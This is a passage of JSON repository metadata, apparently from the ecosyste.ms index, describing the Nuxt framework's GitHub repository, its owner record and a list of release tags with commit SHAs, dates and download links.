8T22:20:10.502Z","dependencies_parsed_at":"2023-12-19T04:00:01.692Z","dependency_job_id":null,"html_url":"https://github.com/nuxt/nuxt","commit_stats":{"total_commits":5138,"total_committers":630,"mean_commits":8.155555555555555,"dds":0.6897625535227715,"last_synced_commit":"800902df129a13e0da40b04b3a09e0d1a9852820"},"previous_names":["nuxt/nuxt.js"],"tags_count":223,"template":null,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":192434804,"owners_count":12699550,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"nuxt","name":"Nuxt","uuid":"23360933","kind":"organization","description":"The Intuitive Vue Framework","email":null,"website":"https://nuxt.com","location":"Global","twitter":"nuxt_js","company":null,"icon_url":"https://avatars.githubusercontent.com/u/23360933?v=4","repositories_count":61,"last_synced_at":"2024-05-20T15:02:00.816Z","metadata":{"has_sponsors_listing":true},"html_url":"https://github.com/nuxt","funding_links":["https://github.com/sponsors/nuxt"],"total_stars":99051,"followers":3259,"following":0,"created_at":"2022-11-02T16:30:40.909Z","updated_at":"2024-05-20T15:02:03.446Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/nuxt/repositories"},"tags":[{"name":"v3.11.1","sha":"a80d1a0d6349bf1003666fc79a513c0d7370c931","kind":"commit","published_at":"2024-03-18T21:33:40.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.11.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.1/manifests"},{"name":"v3.11.0","sha":"78d5098c28d2e21622961d8b87ef9b4623194fec","kind":"commit","published_at":"2024-03-17T08:15:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.11.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.11.0/manifests"},{"name":"v3.10.3","sha":"aaad9924339b4c45d7feb45ed84bac4052edfcf0","kind":"commit","published_at":"2024-02-22T13:56:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.3/manifests"},{"name":"v3.10.2","sha":"ceebcde36642fd3711a2567658cb1337a0475153","kind":"commit","published_at":"2024-02-14T13:00:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.2/manifests"},{"name":"v3.10.1","sha":"460e0cfebd0ad19c7928c8d986e59f93a1bba1a3","kind":"commit","published_at":"2024-02-05T16:48:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.1/manifests"},{"name":"v3.10.0","sha":"da3c502f08587f93e1134bc8e7aea1dee8d628fb","kind":"commit","published_at":"2024-01-30T15:25:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.0/manifests"},{"name":"v3.9.3","sha":"fd8b263326c8703815a7e043948c22a8e5b969e2","kind":"commit","published_at":"2024-01-17T14:19:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.3/manifests"},{"name":"v3.9.2","sha":"97ed2df423ebd8038f16d81e00cd2836ba2d712a","kind":"commit","published_at":"2024-01-16T17:00:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.2/manifests"},{"name":"v2.17.3","sha":"4aa989d68a1934bd107fc5ad4e87549d39277ecd","kind":"tag","published_at":"2024-01-12T15:13:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.3/manifests"},{"name":"v3.9.1","sha":"6736decba0dc8bbc7276848a8a26973440ebdee4","kind":"commit","published_at":"2024-01-05T21:55:58.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.1/manifests"},{"name":"v3.9.0","sha":"c28ef02a1779b1c8a30c3daa2049d3c81a88ac91","kind":"commit","published_at":"2023-12-25T17:24:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.0/manifests"},{"name":"v3.8.2","sha":"8d1fc6c4a9b0f6a662a006489162e66fdeb677b1","kind":"commit","published_at":"2023-11-20T22:22:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.2/manifests"},{"name":"v3.8.1","sha":"d8674b99820d0e4dd620b20d38efb2ee52c80e52","kind":"commit","published_at":"2023-11-06T11:54:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.1/manifests"},{"name":"v2.17.2","sha":"2080d82471962a5a6ea2c7b38c8975c961e919f8","kind":"tag","published_at":"2023-10-24T03:05:46.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.2/manifests"},{"name":"v3.8.0","sha":"59ff865b133aaf82876f73b2d0566a00081b2795","kind":"commit","published_at":"2023-10-19T15:21:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.0/manifests"},{"name":"v3.7.4","sha":"5abd8a231f26a2e08071a59caa87b80eaaa6cd91","kind":"commit","published_at":"2023-09-26T00:18:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.4/manifests"},{"name":"v3.7.3","sha":"16e40f899e753208dd270c30869d240fbff0b8a2","kind":"commit","published_at":"2023-09-13T22:52:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.3/manifests"},{"name":"v3.7.2","sha":"ebacf199fe52b9dfd5cb48f2f4735df0e9adbaac","kind":"commit","published_at":"2023-09-12T21:35:55.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.2/manifests"},{"name":"v3.7.1","sha":"88a6d0a499cc7696bff94c02548cd9cc60f7820b","kind":"commit","published_at":"2023-09-05T13:49:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.1/manifests"},{"name":"v3.7.0","sha":"9013f88e75f499e650463e3c80d116d0ce898a14","kind":"commit","published_at":"2023-08-25T23:26:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.0/manifests"},{"name":"v3.6.5","sha":"f6a3adb52156774ab372829a2ee2533906758288","kind":"commit","published_at":"2023-07-19T17:40:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.5/manifests"},{"name":"v3.6.4","sha":"380a91985c350281aba2d8eb16c65b0ebc39ea8b","kind":"commit","published_at":"2023-07-19T15:19:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.4/manifests"},{"name":"v3.6.3","sha":"f068ad5edda4aaf79906a58ab472c9c3c0f564f1","kind":"commit","published_at":"2023-07-14T22:48:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.3/manifests"},{"name":"v2.17.1","sha":"9de25afa865ca6861a7bb6e3b6b89df56616d93d","kind":"tag","published_at":"2023-07-14T22:35:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.1/manifests"},{"name":"v3.6.2","sha":"88f914e9a01cb8ed196afb653dbcb4f7a5123b15","kind":"commit","published_at":"2023-07-05T21:42:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.2/manifests"},{"name":"v3.6.1","sha":"54a0d5e8dc2184f995169e6b4c5adaba9cffaa6c","kind":"commit","published_at":"2023-06-26T19:25:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.1/manifests"},{"name":"v3.6.0","sha":"e58cfc81f03a2323c95e6671af7deb4c4288bf39","kind":"commit","published_at":"2023-06-23T12:06:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.0/manifests"},{"name":"v2.17.0","sha":"1ce34ec2c438fbad9a04f7eda2ce4f439389ea9a","kind":"tag","published_at":"2023-06-09T20:51:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.0/manifests"},{"name":"v3.5.3","sha":"199595f3afac38b2a41be0a1c5593a8b6ea03366","kind":"commit","published_at":"2023-06-06T00:24:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.3/manifests"},{"name":"v3.5.2","sha":"d85348987f8fd0e36763de69d6c665b630532429","kind":"commit","published_at":"2023-05-29T11:48:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.2/manifests"},{"name":"v3.5.1","sha":"f13ccfe8363e3ababea7379d07822953eea555aa","kind":"commit","published_at":"2023-05-21T16:39:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.1/manifests"},{"name":"v3.5.0","sha":"9683c3dad3fc31d5a2f780f6e7e785c1eeedc797","kind":"commit","published_at":"2023-05-16T13:29:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.0/manifests"},{"name":"v3.4.3","sha":"1464294d6abe13b54fdb8d204732345551c8e647","kind":"commit","published_at":"2023-04-28T19:08:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.3/manifests"},{"name":"v3.4.2","sha":"607bfdcfefe3520c89202fe5a5525794792192d7","kind":"commit","published_at":"2023-04-20T13:51:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.2/manifests"},{"name":"v3.4.1","sha":"940fb0b7ad73960257f3e5f868186c302308e43b","kind":"commit","published_at":"2023-04-13T10:31:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.1/manifests"},{"name":"v3.4.0","sha":"25e3a9046cc1b3dd9c1bf2c188a627b0a9446ad2","kind":"commit","published_at":"2023-04-11T16:17:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.0/manifests"},{"name":"v3.3.3","sha":"8e9d7157a8d4fae6d2d0ae4598dd7c2ae14e5571","kind":"commit","published_at":"2023-04-02T14:14:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.3/manifests"},{"name":"v3.3.2","sha":"dd6f9c01ccea00ddb37d15ce1773a054b99f08db","kind":"commit","published_at":"2023-03-24T18:31:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.2/manifests"},{"name":"v2.16.3","sha":"6ca842e36ed935950608f02b539fc2985f5f3ef9","kind":"tag","published_at":"2023-03-17T15:39:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.3/manifests"},{"name":"v3.3.1","sha":"184d57bb1923b8bf21a372eabdb67e1241d2023f","kind":"commit","published_at":"2023-03-14T14:45:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.1/manifests"},{"name":"v3.3.0","sha":"2ebf5f4c4488c911e8bcc273cb8b12b86bf3562e","kind":"commit","published_at":"2023-03-14T13:22:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.0/manifests"},{"name":"v2.16.2","sha":"ca8b375e2eb38c452b1b227e83c2cdad6de2f030","kind":"tag","published_at":"2023-03-01T13:03:07.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.2/manifests"},{"name":"v3.2.3","sha":"021ba4310e47301996967c2a9b581152095cb995","kind":"commit","published_at":"2023-02-28T11:19:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.3/manifests"},{"name":"v3.2.2","sha":"3a832bacb8f747bc3df656ddb926defe607b07f3","kind":"commit","published_at":"2023-02-17T16:39:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.2/manifests"},{"name":"v3.2.1","sha":"5c47d4c5ab0add324a412c9d64700acf41b41f5b","kind":"commit","published_at":"2023-02-17T15:56:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.1/manifests"},{"name":"v2.16.1","sha":"41148648ee597424c94a31ce0f36bb742c5ec695","kind":"commit","published_at":"2023-02-13T12:08:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.1/manifests"},{"name":"v3.2.0","sha":"5855c1ed53ae1336fcfeb118a27c7201a9b83949","kind":"commit","published_at":"2023-02-09T10:55:03.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,